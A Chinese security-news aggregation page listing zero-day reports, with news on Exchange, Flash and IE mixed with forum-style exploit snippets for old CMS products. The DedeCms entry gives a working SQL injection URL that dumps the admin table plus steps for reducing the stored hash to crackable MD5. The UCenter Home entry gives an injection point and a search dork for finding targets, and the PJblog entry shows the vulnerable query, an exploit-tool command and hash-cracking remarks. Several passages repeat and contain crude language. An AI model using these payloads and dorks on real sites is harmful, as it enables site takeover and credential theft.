国家支持的黑客可能利用MS Exchange对约10个组织进行了0day攻击
微软周五披露,2022年8月,一个活动组实现了初始访问,并通过将两个新披露的零日漏洞链接在一组针对全球不到10个组织的有限攻击中,从而破坏了Exchange服务器。 “这些攻击安装了Chopper网络……
美国休斯顿港曾遭网络攻击 运营及系统未受影响
据美国主要港口之一的休斯顿港透露,该港在8月份遭遇了一次据称由民族国家行为者策划的网络攻击,但其系统没有受到影响。 港口官员在9月23日发表的一份声明写道,“休斯顿港务局(休斯顿港)在8 月份成功抵御……
微软IE11的0day漏洞提示
此次Hackingteam泄露的数据影响巨大,先后爆出3个Flash0day,1个Font提权0day,昨天在twitter上又有人公布了一个新的windows权限提升0day,阿里安全研究人员又从邮件中发现一处针对IE11 的0day,0day频繁爆出,各位请关好门窗,防火防盗!
黑客发现Adobe Flash播放器第二个零日漏洞
黑客通过分析最近意大利监控软件厂商泄漏的文件,发现Adobe Flash播放器存在第2个零日漏洞,同时他们还发现了Windows中的一个零日漏洞。
微软证实某0-day漏洞影响IE10和IE9 已发布紧急修复补丁
上周,微软证实了IE10曝出一个“0-day漏洞”的消息,并且该漏洞已经被用于至少一起逍遥在外的攻击中。今天,该公司再发安全警告,证实了相关漏洞也被用于针对IE9的攻击中。
APT攻击背后的秘密:攻击性质及特征分析
对于APT攻击,企业很难做到阻止,应对这种攻击通常需要明确的响应和恢复计划,这样做的目的是减少损害和损失。因为一旦发现APT活动,这通常意味着已经为时已晚。
易通企业网站系统存在0day漏洞
2012年6月4日,互联网安全公司知道创宇安全研究团队发现易通企业网站系统(CmsEasy)存在严重越权0day漏洞,该漏洞在易通4.6~5.0版本中普遍存在,通过该漏洞,攻击者可以非常轻易获取网站管……
DedeCms V5.6 注入 0day
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助注入。
漏洞利用:
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
$sql 变量未初始化。导致鸡助注入。
漏洞利用:
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
回顾KingCMS ASP 5.0/5.1漏洞利用方法 ZT
KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统,前台全部静态化处理,新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力,现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点,特别是针对比较懒的站长。
漏洞算不上0day,但是却具有0day的危害效果,主要是因管理为对后台路径和编辑器路径做更改,系统是使用FCKeditor编辑器,这个编辑器的漏洞大家都比较熟悉了,下面就给出具体利用方法。
利用前提:管理员未更改后台路径以及FCKeditor编辑器路径做更改。
...
漏洞算不上0day,但是却具有0day的危害效果,主要是因管理为对后台路径和编辑器路径做更改,系统是使用FCKeditor编辑器,这个编辑器的漏洞大家都比较熟悉了,下面就给出具体利用方法。
利用前提:管理员未更改后台路径以及FCKeditor编辑器路径做更改。
...
转:传说中的DZ 0day?——经测试可用
从zhenker的百度空间转转过来的,游侠刚测试了下,可以用!OK , Let's Go !
UCenter Home 2.0 shop插件漏洞都叫做DZ 0DYAY了。真杯具。
注入页: shop.php
注入字段: (?)ac=view&shopid=
关键词: inurl:shop.php?ac=view&shopid=
UCenter Home 2.0 shop插件漏洞都叫做DZ 0DYAY了。真杯具。
注入页: shop.php
注入字段: (?)ac=view&shopid=
关键词: inurl:shop.php?ac=view&shopid=
Discuz 7.1 0day、Discuz 7.2 0day紧急应对方式
上午的时候在群(53651293)里面听到有哥们说Discuz 7.1和7.2出0day了,下午就得到了证实……
www.cnciso.com/bbs就被群里面的哥们拿来做了测试……给写了个tool.php进去,然后发了个密码给我……
去Discuz官方发了几个帖子,依此被转移到了内部讨论区……我也没权限了。
这次问题比较严重,查到的说是msic.php有注入问题,另一个文件可以跨站,另据传,有个可以直接拿到shell的漏洞……详情不知,探索中……
下面是在Windows服务器下面的解决方法,很简单:forumdata/cache的脚本执行权限去掉就OK,另外据传:DedeCMS的cache目录也要如此设置……多余的话不说了 嘿嘿。
设置完后,cache下面的shell执行的时候提示如下:
传闻:落伍者、站长网已经被搞,游侠亲眼看到了后者的shell图,确切的说是一句话……静待官方的补丁出来吧。
www.cnciso.com/bbs就被群里面的哥们拿来做了测试……给写了个tool.php进去,然后发了个密码给我……
去Discuz官方发了几个帖子,依此被转移到了内部讨论区……我也没权限了。
这次问题比较严重,查到的说是msic.php有注入问题,另一个文件可以跨站,另据传,有个可以直接拿到shell的漏洞……详情不知,探索中……
下面是在Windows服务器下面的解决方法,很简单:forumdata/cache的脚本执行权限去掉就OK,另外据传:DedeCMS的cache目录也要如此设置……多余的话不说了 嘿嘿。
设置完后,cache下面的shell执行的时候提示如下:
传闻:落伍者、站长网已经被搞,游侠亲眼看到了后者的shell图,确切的说是一句话……静待官方的补丁出来吧。
PJblog V3.0 0day Vbs版漏洞利用工具
用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名
我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具。
我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具。
PJblog V3.0 0day
影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
很SB的洞。
第14行
Copy codestrcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
这个贱B下午就跑人官方去捣乱了。
强奸出的密码是sha1,突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
...
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
很SB的洞。
第14行
Copy codestrcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
这个贱B下午就跑人官方去捣乱了。
强奸出的密码是sha1,突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
...
微软MS09-002漏洞攻击代码惊现互联网
据了解,该漏洞存在于微软IE7浏览器中,如果用户没有及时修补该漏洞,当用户使用存在漏洞的IE7浏览器浏览网页时,一旦打开了被黑客恶意挂马的网页时,病毒就会利用该漏洞入侵到用户计算机中,给用户带来严重的损失。
据江民反病毒专家介绍,目前微软MS09-002漏洞还没有被大量用于网页挂马,但随着攻击代码被完全公布在互联网上,预计在未来的几天内就会被国内的黑客大面积利用,用于广泛的传播各种恶
据江民反病毒专家介绍,目前微软MS09-002漏洞还没有被大量用于网页挂马,但随着攻击代码被完全公布在互联网上,预计在未来的几天内就会被国内的黑客大面积利用,用于广泛的传播各种恶
